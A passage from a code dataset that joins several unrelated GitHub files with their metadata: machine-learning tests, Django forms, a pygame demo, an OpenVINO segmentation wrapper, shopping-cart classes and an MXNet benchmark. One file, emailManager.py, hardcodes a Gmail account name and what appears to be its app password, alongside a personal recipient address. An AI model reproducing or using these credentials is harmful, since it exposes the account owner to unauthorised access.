mean_model_contributions_ts.columns.tolist() == [\n \"channel_1\",\n \"channel_2\",\n \"control_1\",\n \"control_2\",\n \"sin_order_1\",\n \"cos_order_1\",\n \"sin_order_2\",\n \"cos_order_2\",\n \"intercept\",\n ]\n\n @pytest.mark.parametrize(\n argnames=\"yearly_seasonality\",\n argvalues=[None, 1, 2],\n ids=[\"no_yearly_seasonality\", \"yearly_seasonality=1\", \"yearly_seasonality=2\"],\n )\n def test_get_fourier_models_data(\n self, toy_df: pd.DataFrame, yearly_seasonality: Optional[int]\n ) -> None:\n mmm = DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=[\"channel_1\", \"channel_2\"],\n control_columns=[\"control_1\", \"control_2\"],\n adstock_max_lag=2,\n yearly_seasonality=yearly_seasonality,\n )\n\n if yearly_seasonality is None:\n with pytest.raises(ValueError):\n mmm._get_fourier_models_data()\n\n else:\n fourier_modes_data: Optional[pd.DataFrame] = mmm._get_fourier_models_data()\n assert fourier_modes_data.shape == (\n toy_df.shape[0],\n 2 * yearly_seasonality,\n )\n assert fourier_modes_data.max().max() <= 1\n assert fourier_modes_data.min().min() >= -1\n", "repo_name": "Mahrukhw/pymc-marketing", "sub_path": "tests/mmm/test_delayed_saturated_mmm.py", "file_name": "test_delayed_saturated_mmm.py", "file_ext": "py", "file_size_in_byte": 7855, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "46", "api": [{"api_name": "numpy.random", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.default_rng", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.date_range", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 37, "usage_type": "call"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 38, "usage_type": "name"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 49, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 86, "usage_type": "name"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 89, "usage_type": "call"}, {"api_name": "arviz.InferenceData", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pymc.sample_prior_predictive", "line_number": 103, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 108, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 115, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 124, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 130, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 139, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 149, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 65, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 76, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 163, "usage_type": "call"}, {"api_name": "arviz.InferenceData", "line_number": 177, "usage_type": "attribute"}, {"api_name": "arviz.extract", "line_number": 179, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 184, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 187, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 190, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 193, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 225, "usage_type": "name"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 227, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 238, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 242, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 219, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 219, "usage_type": "attribute"}]} +{"seq_id": "72254866682", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom core.models import Passenger, Taxi\n\n\n\nclass BasicUserForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ('first_name', 'last_name')\n\n\nclass BasicCustomerForm(forms.ModelForm):\n class Meta:\n model = Passenger\n fields = ('profile_photo', 'phone_number')\n\n\nclass TaxiBookingForm(forms.ModelForm):\n pickup_address = forms.CharField(\n max_length=255,\n required=True,\n label='',\n widget=forms.TextInput(attrs={\n 'placeholder': 'Where are you?',\n 'class': 'form-control'\n })\n )\n dropoff_address = forms.CharField(\n max_length=255,\n required=True,\n label='',\n widget=forms.TextInput(attrs={\n 'placeholder': 'Where do you want to go?',\n 'class': 'form-control'\n })\n )\n taxi_size = forms.ChoiceField(\n choices=Taxi.TAXI_SIZE,\n widget=forms.Select(attrs={'class': 'form-control'})\n )\n description = forms.CharField(\n label='',\n widget=forms.Textarea(attrs={'rows': 2, 'cols': 20, 'placeholder': 'Write description or a message for the driver', 'class': 'form-control'}),\n required=False\n )\n pickup_datetime = forms.DateTimeField(\n label='Pickup Date and Time',\n widget=forms.DateTimeInput(attrs={'type': 'datetime-local', 'class': 'form-control'}),\n input_formats=['%d-%m-%YT%H:%M'],\n )\n\n class Meta:\n model = Taxi\n fields = ['pickup_address', 'dropoff_address', 'taxi_size', 'description', 'pickup_datetime']\n", "repo_name": "shahbakhat/Taksy", "sub_path": "core/passenger/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 13, "usage_type": "name"}, {"api_name": "core.models.Passenger", "line_number": 15, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 24, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 24, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 33, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 33, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 38, "usage_type": "name"}, {"api_name": "core.models.Taxi.TAXI_SIZE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "core.models.Taxi", "line_number": 39, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 40, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 40, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 42, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 44, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 44, "usage_type": "name"}, {"api_name": "django.forms.DateTimeField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 47, "usage_type": "name"}, {"api_name": "django.forms.DateTimeInput", "line_number": 49, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 49, "usage_type": "name"}, {"api_name": "core.models.Taxi", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "71337467659", "text": "import pygame\nfrom pygtails import Game, Circle\nfrom colors import *\n\nclass CirclePoke(Game):\n def __init__(self):\n super().__init__((400, 300), \"Circle Fun\")\n self.screen.fill(WHITE)\n pygame.display.flip()\n c = PokeyCircle(self)\n c.draw()\n\nclass PokeyCircle(Circle):\n def __init__(self, game):\n super().__init__(game, (20, 20), 50)\n self.color = BLUE\n\n def draw(self):\n pygame.draw.circle(self.game.screen, self.color,\n self.center, self.radius)\n pygame.display.flip()\n\n def on_mouse_down(self, event):\n if self.color == BLUE:\n self.color = GREEN\n else:\n self.color = BLUE\n self.draw()\n\ngame = CirclePoke()\ngame.main()\n", "repo_name": "josiest/pygtails", "sub_path": "examples/circle_fun.py", "file_name": "circle_fun.py", "file_ext": "py", "file_size_in_byte": 764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "pygtails.Game", "line_number": 5, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygtails.Circle", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.draw.circle", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "39138532466", "text": "import sys\nfrom collections import defaultdict, deque\n\nn = int(sys.stdin.readline())\ndicts = defaultdict(list)\nvisited = [0] * (n + 1)\nq = deque()\nq.append(1)\n\nfor _ in range(n - 1):\n node_a, node_b = map(int, sys.stdin.readline().split())\n dicts[node_a].append(node_b)\n dicts[node_b].append(node_a)\n\nwhile q:\n idx = q.popleft()\n for i in dicts[idx]:\n if not visited[i]:\n visited[i] = idx\n q.append(i)\n\nprint(*visited[2:], sep=\"\\n\")", "repo_name": "Real-Man-Club/Baekjoon", "sub_path": "devappmin/11725.트리의 부모 찾기.py", "file_name": "11725.트리의 부모 찾기.py", "file_ext": "py", "file_size_in_byte": 476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.stdin.readline", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 4, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 5, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.stdin.readline", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 11, "usage_type": "attribute"}]} +{"seq_id": "72272987642", "text": "# cmd .\\.venvs\\lpthw\\Scripts\\activate 转到虚拟空间\n# cmd cd 到存放文件目录\n# python app.py\n# html 居然没注释成功!!\nfrom flask import Flask\nfrom flask import render_template\n# 这个函数知道如何去template/目录加载模板.html文件,这是flask的默认设置\n# render 渲染\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n greeting = \"Hello World!\"\n # 向模板(template)提供参数 html中出项greeting的位置都是传递给模板的变量\n return render_template(\"index.html\",greeting = greeting)\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "Jcduhdt/python", "sub_path": "lpthw/ex50/gothonweb/bin/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 595, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "35573080134", "text": "from django.test import TestCase\n\nfrom ...common import Encoding\n\n\nclass EncodingTest(TestCase):\n def test_get_available_encodings_returns_a_list_of_encoding_elements(self):\n encodings = Encoding.get_available_encodings()\n\n self.assertTrue(isinstance(encodings, list))\n\n for each in encodings:\n self.assertTrue(isinstance(each, Encoding))\n\n def test_each_available_encoding_has_a_corresponding_serialization_object(self):\n encodings = Encoding.get_available_encodings()\n for each in encodings:\n try:\n each.get_serialization_object()\n except ValueError:\n self.fail(\n 'Encoding %s does not have a corresponding serialization \\\nobject.'\n )\n finally:\n pass\n", "repo_name": "WeZZard/django-pki", "sub_path": "django_pki_manager/tests/common/encoding.py", "file_name": "encoding.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.test.TestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "common.Encoding.get_available_encodings", "line_number": 8, "usage_type": "call"}, {"api_name": "common.Encoding", "line_number": 8, "usage_type": "name"}, {"api_name": "common.Encoding", "line_number": 13, "usage_type": "argument"}, {"api_name": "common.Encoding.get_available_encodings", "line_number": 16, "usage_type": "call"}, {"api_name": "common.Encoding", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "40761823721", "text": "from redmail import gmail\nfrom datetime import datetime\nimport pytz\nimport socket\n\ngmail.username = \"bst.einbruchschutz@gmail.com\"\ngmail.password = \"ssnnpngxsrnjdsvi\"\n\n\ndef sendGmail_svenVersion(*args, subject):\n gmail.send(\n subject=f\"[Event-Server] {get_host_name()} von eAccess-Webclient\",\n receivers=[\"ramzi.d@outlook.com\"],\n html=f\"\"\"\n

Guten Tag

\n

\n

Ein Server ist nicht mehr erreichbar! Nachfolgend die Informationen vom Server:

\n

PC-Name: {get_host_name()}

\n

PC-Adresse: {get_local_ip()}

\n

Der Server ist hat keine Verbindung seit:

\n

Datum: {datum()}

\n

Zeit: {time()}

\n

Bitte Verbindung kontrollieren und wiederherstellen.\n

BST Einbruchschutz

\n \"\"\",\n )\n\n\ndef sendGmail_ramziVersion(*args, subject, text_1=\"\", text_2=\"\"):\n gmail.send(\n subject=subject,\n receivers=[\"ramzi.d@outlook.com\"],\n html=f\"\"\"\n

Guten Tag

\n

{args}

\n

<{text_1}/p>\n

\n

{text_2}

\n

\n

Datum: {datum()}

\n

Zeit: {time()}

\n

\n

BST Einbruchschutz

\n \"\"\",\n )\n\n\ndef datum():\n current_date = datetime.now()\n swiss_date_format = current_date.strftime(\"%d.%m.%Y\")\n return swiss_date_format\n\n\ndef time():\n zurich_tz = pytz.timezone(\"Europe/Zurich\")\n\n # Get the current time with the Zurich timezone\n current_time = datetime.now(zurich_tz)\n\n # Format the time in Swiss format\n swiss_time_format = current_time.strftime(\"%H:%M:%S\")\n\n # Print the time in Swiss format with Zurich timezone\n return swiss_time_format\n\n\ndef get_local_ip():\n try:\n # Get the hostname of the machine\n hostname = socket.gethostname()\n\n # Get the IP address associated with the hostname\n local_ip = socket.gethostbyname(hostname)\n\n return local_ip\n except socket.gaierror as e:\n return f\"there is Error: {e} please control ur script\"\n\n\ndef get_host_name():\n try:\n # Get the hostname of the machine\n hostname = socket.gethostname()\n return hostname\n except Exception as e:\n print(f\"Error occurred: {e}\")\n return f\"there is Error: {e} please control ur script\"\n", "repo_name": "Ramzi-dr/canneraldBackupServer", "sub_path": "doorsProject/emailManager.py", "file_name": "emailManager.py", "file_ext": "py", "file_size_in_byte": 2501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "redmail.gmail.username", "line_number": 6, "usage_type": "attribute"}, {"api_name": "redmail.gmail", "line_number": 6, "usage_type": "name"}, {"api_name": "redmail.gmail.password", "line_number": 7, "usage_type": "attribute"}, {"api_name": "redmail.gmail", "line_number": 7, "usage_type": "name"}, {"api_name": "redmail.gmail.send", "line_number": 11, "usage_type": "call"}, {"api_name": "redmail.gmail", "line_number": 11, "usage_type": "name"}, {"api_name": "redmail.gmail.send", "line_number": 30, "usage_type": "call"}, {"api_name": "redmail.gmail", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "socket.gethostname", "line_number": 70, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 73, "usage_type": "call"}, {"api_name": "socket.gaierror", "line_number": 76, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "72428955962", "text": "import cv2\nimport numpy as np\n\nfrom types import SimpleNamespace as namespace\n\nfrom .ie_tools import IEModel\nfrom .segm_postprocess import postprocess\n\n\nclass MaskRCNN(IEModel):\n def __init__(self, core, model_path, labels_file, conf=.6, device='CPU'):\n super().__init__(core, model_path, labels_file, conf, device)\n\n self.input_keys = {'image'}\n self.output_keys = {'boxes', 'labels', 'masks'}\n self.input_keys_segmentoly = {'im_info', 'im_data'}\n self.output_keys_segmentoly = {'boxes', 'scores', 'classes', 'raw_masks'}\n\n self.segmentoly_type = self.check_segmentoly_type()\n self.input_tensor_name = 'im_data' if self.segmentoly_type else 'image'\n self.n, self.c, self.h, self.w = self.model.input(self.input_tensor_name).shape\n\n def check_segmentoly_type(self):\n for input_tensor_name in self.input_keys_segmentoly:\n try:\n self.model.input(input_tensor_name)\n except RuntimeError:\n return False\n for output_tensor_name in self.output_keys_segmentoly:\n try:\n self.model.output(output_tensor_name)\n except RuntimeError:\n return False\n return True\n\n def get_allowed_inputs_len(self):\n return (1, 2)\n\n def get_allowed_outputs_len(self):\n return (3, 4, 5)\n\n def _preprocess(self, frame):\n image_height, image_width = frame.shape[:2]\n scale = min(self.h / image_height, self.w / image_width)\n processed_image = cv2.resize(frame, None, fx=scale, fy=scale)\n processed_image = processed_image.astype('float32').transpose(2, 0, 1)\n height, width = processed_image.shape[1], processed_image.shape[2]\n im_info = np.array([height, width, 1.0], dtype='float32') if self.segmentoly_type else None\n meta=namespace(\n original_size=frame.shape[:2],\n processed_size=processed_image.shape[1:3],\n )\n return processed_image, im_info, meta\n\n def forward(self, im_data, im_info):\n if (self.h - im_data.shape[1] < 0) or (self.w - im_data.shape[2] < 0):\n raise ValueError('Input image should have the resolution of {}x{} or less, '\n 'got {}x{}.'.format(self.w, self.h, im_data.shape[2], im_data.shape[1]))\n im_data = np.pad(im_data, ((0, 0),\n (0, self.h - im_data.shape[1]),\n (0, self.w - im_data.shape[2])),\n mode='constant', constant_values=0).reshape(1, self.c, self.h, self.w)\n feed_dict = {self.input_tensor_name: im_data}\n if im_info is not None:\n im_info = im_info.reshape(1, *im_info.shape)\n feed_dict['im_info'] = im_info\n self.infer_request.infer(feed_dict)\n if self.segmentoly_type:\n output = {name: self.infer_request.get_tensor(name).data[:] for name in self.output_keys_segmentoly}\n valid_detections_mask = output['classes'] > 0\n classes = output['classes'][valid_detections_mask]\n boxes = output['boxes'][valid_detections_mask]\n scores = output['scores'][valid_detections_mask]\n masks = output['raw_masks'][valid_detections_mask]\n else:\n output = {name: self.infer_request.get_tensor(name).data[:] for name in self.output_keys}\n valid_detections_mask = np.sum(output['boxes'], axis=1) > 0\n classes = output['labels'][valid_detections_mask] + 1\n boxes = output['boxes'][valid_detections_mask][:, :4]\n scores = output['boxes'][valid_detections_mask][:, 4]\n masks = output['masks'][valid_detections_mask]\n return boxes, classes, scores, np.full(len(classes), 0, dtype=np.int32), masks\n\n def get_detections(self, frames, return_cropped_masks=False):\n outputs = []\n for frame in frames:\n im_data, im_info, meta = self._preprocess(frame)\n\n boxes, classes, scores, _, masks = self.forward(im_data, im_info)\n scores, classes, boxes, masks = postprocess(scores, classes, boxes, masks,\n im_h=meta.original_size[0],\n im_w=meta.original_size[1],\n im_scale_y=meta.processed_size[0] / meta.original_size[0],\n im_scale_x=meta.processed_size[1] / meta.original_size[1],\n full_image_masks=True, encode_masks=False,\n confidence_threshold=self.confidence,\n segmentoly_postprocess=self.segmentoly_type)\n frame_output = []\n for i in range(len(scores)):\n if classes[i] in self.labels_to_hide:\n bbox = [int(value) for value in boxes[i]]\n if return_cropped_masks:\n left, top, right, bottom = bbox\n mask = masks[i][top:bottom, left:right]\n else:\n mask = masks[i]\n frame_output.append([bbox, scores[i], mask])\n outputs.append(frame_output)\n return outputs\n\n\nclass SemanticSegmentation(IEModel):\n @staticmethod\n def set_classes_to_hide():\n return ('person', 'rider', )\n\n def get_detections(self, frames, only_class_person=True):\n outputs = []\n for frame in frames:\n out_h, out_w = frame.shape[:-1]\n res = self.forward(frame)\n output = []\n for data in res:\n data = data.transpose((1, 2, 0)).astype('uint8')\n data = cv2.resize(data, (out_w, out_h))\n data = np.isin(data, self.labels_to_hide).astype('uint8')\n output.append([[0, 0, out_w - 1, out_h - 1], 1., data.astype('uint8')])\n outputs.append(output)\n return outputs\n", "repo_name": "openvinotoolkit/open_model_zoo", "sub_path": "demos/whiteboard_inpainting_demo/python/utils/network_wrappers.py", "file_name": "network_wrappers.py", "file_ext": "py", "file_size_in_byte": 6111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3804, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ie_tools.IEModel", "line_number": 10, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "types.SimpleNamespace", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "segm_postprocess.postprocess", "line_number": 90, "usage_type": "call"}, {"api_name": "ie_tools.IEModel", "line_number": 112, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "754314620", "text": "import requests\n\n# --------------------------------------------------------------------------------\n# Function: calculate_total\n# --------------------------------------------------------------------------------\n\ndef calculate_total(subtotal, shipping, discount, tax_percent):\n if subtotal < 0:\n raise ValueError('subtotal cannot be negative')\n if shipping < 0:\n raise ValueError('shipping cannot be negative')\n if discount < 0:\n raise ValueError('discount cannot be negative')\n if tax_percent < 0:\n raise ValueError('tax_percent cannot be negative')\n\n amount = subtotal + shipping - discount\n if amount < 0:\n total = 0\n else:\n total = amount * (1 + tax_percent)\n\n rounded = round(total, 2)\n return rounded\n\n\n# --------------------------------------------------------------------------------\n# Class: Item\n# --------------------------------------------------------------------------------\n\nclass Item:\n def __init__(self, name, unit_price, quantity=1):\n self.name = name\n self.unit_price = unit_price\n self.quantity = quantity\n\n def calculate_item_total(self):\n total = self.quantity * self.unit_price\n rounded = round(total, 2)\n return rounded\n\n\n# --------------------------------------------------------------------------------\n# Class: Order\n# --------------------------------------------------------------------------------\n\nclass Order:\n def __init__(self, shipping=0, discount=0, tax_percent=0):\n self.items = []\n self.shipping = shipping\n self.discount = discount\n self.tax_percent = tax_percent\n\n def add_item(self, item):\n self.items.append(item)\n\n def calculate_subtotal(self):\n subtotal = 0\n for item in self.items:\n subtotal += item.calculate_item_total()\n return subtotal\n\n def calculate_order_total(self):\n subtotal = self.calculate_subtotal()\n total = calculate_total(\n subtotal, self.shipping, self.discount, self.tax_percent)\n return total\n \n def get_reward_points(self):\n points = int(self.calculate_order_total())\n if points >= 1000:\n points += 10\n return points\n\n\n# --------------------------------------------------------------------------------\n# Class: DynamicallyPricedItem\n# --------------------------------------------------------------------------------\n\nclass DynamicallyPricedItem:\n def __init__(self, id, quantity=1):\n self.id = id\n self.quantity = quantity\n\n def get_latest_price(self):\n endpoint = 'https://api.pandastore.com/getitem/' + str(self.id)\n response = requests.get(endpoint)\n price = response.json()['price']\n return price\n\n def calculate_item_total(self):\n total = self.quantity * self.get_latest_price()\n rounded = round(total, 2)\n return rounded\n", "repo_name": "AutomationPanda/shopping-cart-unit-tests", "sub_path": "shopping_cart/orders.py", "file_name": "orders.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "20835861447", "text": "import mxnet as mx\nfrom benchmark.opperf.utils.benchmark_utils import run_performance_test\nfrom benchmark.opperf.utils.common_utils import merge_map_list\nfrom benchmark.opperf.rules.default_params import MX_OP_MODULE\n\n\"\"\"Performance benchmark tests for MXNet NDArray Convolution and Pooling Operators.\n\nMXNet NDArray Pooling Operators\n\n1. MaxPool1D\n2. MaxPool2D\n3. SumPool1D\n4. SumPool2D\n4. AvgPool1D\n5. AvgPool2D\n6. GlobalMaxPool1D\n7. GlobalMaxPool2D\n8. GlobalAvgPool1D\n9. GlobalAvgPool2D\n10.GlobalSumPool1D\n11.GlobalSumPool2D\n12.ROIPooling\n\n(Under the hood uses mx.nd.pooling)\n\nMXNet NDArray NN Convolution Operators\n\n1. Conv1D\n2. Conv2D\n3. Conv1DTranspose (DeConvolution)\n4. Conv2DTranspose (DeConvolution)\n\n(Under the hood uses mx.nd.convolution, mx.nd.Deconvolution)\n\n\"\"\"\n\n\ndef run_pooling_operators_benchmarks(ctx=mx.cpu(), dtype='float32', profiler='native', int64_tensor='off', warmup=25, runs=100):\n \"\"\"Runs benchmarks with the given context, precision (dtype), and input data size (int64_tensor) for all the pooling\n operators in MXNet.\n\n Parameters\n ----------\n ctx: mx.ctx\n Context to run benchmarks\n dtype: str, default 'float32'\n Precision to use for benchmarks\n profiler: str, default 'native'\n Type of Profiler to use (native/python)\n int64_tensor: str, default 'off'\n Input tensor size to use for tests (if on, dimensions >= 2**32)\n warmup: int, default 25\n Number of times to run for warmup\n runs: int, default 100\n Number of runs to capture benchmark results\n\n Returns\n -------\n Dictionary of results. Key -> Name of the operator, Value -> Benchmark results.\n\n \"\"\"\n pool_types = ['avg', 'max', 'sum']\n global_pool_types = [0, 1]\n\n standard_data_list_pool1d = [(32, 3, 256), (32, 3, 64)]\n int64_tensor_data_list_pool1d = [(1, 1, 2**32)]\n standard_data_list_pool2d = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_pool2d = [(2**28, 1, 4, 4)]\n standard_data_list_roipool = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_roipool = [(32, 3, 2**13, 2**13)]\n\n if int64_tensor == 'on':\n data_list_pool1d = int64_tensor_data_list_pool1d\n data_list_pool2d = int64_tensor_data_list_pool2d\n data_list_roipool = int64_tensor_data_list_roipool\n else:\n data_list_pool1d = standard_data_list_pool1d\n data_list_pool2d = standard_data_list_pool2d\n data_list_roipool = standard_data_list_roipool\n\n # Run 1D and 2D Pooling performance runs\n pool1d_benchmark_res = []\n pool2d_benchmark_res = []\n for pool_type in pool_types:\n for global_pool in global_pool_types:\n for pool1d_data in data_list_pool1d:\n pool1d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Pooling\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": pool1d_data,\n \"kernel\": 3,\n \"pool_type\": pool_type,\n \"global_pool\": global_pool,\n \"stride\": 1,\n \"pad\": 1}\n ],\n warmup=warmup,\n runs=runs)\n for pool2d_data in data_list_pool2d:\n pool2d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Pooling\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": pool2d_data,\n \"kernel\": (3, 3),\n \"pool_type\": pool_type,\n \"global_pool\": global_pool,\n \"stride\": (1, 1),\n \"pad\": (0, 0)}\n ],\n warmup=warmup,\n runs=runs)\n # Run ROI Pooling performance runs\n roipool_benchmark_res = []\n for roipool_data in data_list_roipool:\n roipool_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"ROIPooling\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": roipool_data,\n \"rois\": (32, 5),\n \"pooled_size\": (2, 2),\n \"spatial_scale\": .5}\n ],\n warmup=warmup,\n runs=runs)\n # Prepare combined results\n mx_pooling_op_results = merge_map_list(pool1d_benchmark_res + pool2d_benchmark_res + roipool_benchmark_res)\n return mx_pooling_op_results\n\n\ndef run_convolution_operators_benchmarks(ctx=mx.cpu(), dtype='float32', profiler='native', int64_tensor='off', warmup=25, runs=100):\n \"\"\"Runs benchmarks with the given context, precision (dtype), and input data size (int64_tensor) for all the convolution\n operators in MXNet.\n\n Parameters\n 